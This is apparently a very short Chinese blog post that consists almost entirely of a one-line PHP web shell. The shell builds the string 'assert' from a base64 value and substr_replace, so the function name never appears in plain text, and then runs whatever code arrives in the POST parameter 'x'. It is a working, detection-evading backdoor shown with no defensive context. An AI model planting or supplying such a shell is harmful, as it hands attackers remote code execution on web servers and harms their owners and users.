比如PHP
<?php $a = base64_decode('YXNzZXh4'); $a = substr_replace($a,'rt',4); $a($_POST['x']); ?>
posted on 2021-05-18 10:56 tech_lee 阅读(65) 评论(0) 收藏 举报